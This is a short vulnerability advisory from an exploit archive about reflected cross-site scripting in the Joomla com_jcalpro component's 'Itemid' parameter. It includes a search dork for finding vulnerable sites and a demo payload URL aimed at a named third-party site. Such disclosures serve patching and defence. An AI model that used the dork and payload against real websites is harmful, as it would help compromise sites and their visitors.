Joomla Component com_jcalpro XSS

2016.07.17
Credit: howucan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[x] Joomla Component com_jcalpro [x] Date: 17/07/2016 {x} Dork : inurl:index.php?option=com_jcalpro "itemid" [x] Author: howucan [x] Contact: howucan.gr@gmail.com [x] Website: http://howucan.gr [x] Software link : http://extensions.joomla.org/extension/jcal-pro [x] Bug: XSS on Component com_jcalpro [x] [x] Example: http://www.site.com/index.php?option=com_jcalpro&Itemid=[XSS] [x] [x] Demo: http://www.ekasth.gr/index.php?option=com_jcalpro&Itemid=80%22%3E%3Ch1%3EXSS3D%20By%20howucan%3C/h1%3E&action=edit [x] "Itemid” parameter not sanitized you could inject a XSS vector on the URL and get reflected on the screen.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top